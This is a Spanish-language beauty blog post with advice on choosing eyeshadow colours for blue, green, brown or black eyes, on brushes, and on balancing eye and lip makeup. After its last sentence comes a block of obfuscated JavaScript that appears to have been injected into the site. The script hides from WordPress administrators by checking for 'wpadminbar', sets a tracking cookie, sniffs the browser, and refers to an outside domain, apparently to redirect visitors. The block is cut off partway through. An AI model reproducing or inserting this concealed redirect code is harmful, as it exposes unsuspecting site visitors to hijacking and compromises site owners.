Hoy voy a ayudaros a escoger, en la medida de lo posible, los colores que más nos pueden favorecer con respecto a nuestro color de ojos. En principio no hay ninguna regla escrita sobre este tema, por eso quiero decir que independientemente del color de nuestros ojos, podemos variar escogiendo tonos claros u oscuros dependiendo incluso del color de la ropa que hayamos escogido ese dia.

Si bien es cierto que siempre habrá tonos que nos favorezcan más que otros, podemos aplicar distintas tonalidades en cualquier color de ojos.

Algo que no debemos de dejar pasar y que es “SUPER IMPORTANTE” es hacernos con unos buenos pinceles. Bastará con 2 o 3 para aplicar sombras y poder difuminarlas bien. Es algo que lleva un poco de maña y muuucha práctica, así que no os preocupéis si el primer dia no os sale perfecto, la práctica hace que poco a poco nos convirtamos en verdaderas expertas con nosotras mismas.

La clave para poder escoger la sombra o sombras que resaltan nuestros ojos, es precisamente lo contrario, escoger colores opuestos a nuestro color para que resalten. Nos equivocamos en elegir para nuestros ojos azules sombras del mismo color, ya que crearemos el efecto contrario. Cuidado, no digo que no nos favorezca y que quede mal, pero simplemente no destacarán tanto nuestro color natural.

Si tenemos los ojos azules o verdes elegiremos colores grises, rosas, café, violetas, dorados o negros. Son los que llamamos colores fríos.

Si tenemos los ojos en la gama de marrones o negros podemos resaltarlos con infinidad de colores, incluso más que los azules o verdes, ya que nos quedarán bien toda la gama de  ocres y marrones y además podremos utilizar verdes, grises o incluso plateados.
Si aplicamos un color y es oscuro, quedará más bonito si lo aplicamos solo en el párpado móvil y dejamos el resto sin maquillar.
Si nos gusta aplicar más de un color, tened en cuenta que en la zona del párpado móvil siempre aplicaremos el/los color/es más oscuros y dejaremos los más claros para agrandar e iluminar la parte más próxima a la ceja.

Recordad que si queremos resaltar nuestros ojos con sombras muy marcadas, deberemos ser un poco más minimalistas a la hora de escoger el labial, ya que debemos resaltar una de las dos cosas. Me explico… si maquillamos los ojos con colores ahumados muy extremos, tendremos suficiente con maquillar los labios con un brillo o un labial en tonos NUDE. Menos es más chicas.

Aprovechad la infinidad de colores que nos ofrecen los muebles de colorido de las distintas marcas, y no os quedéis estancadas siempre en el mismo.
¡¡ En la variedad está el gusto!!;) var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone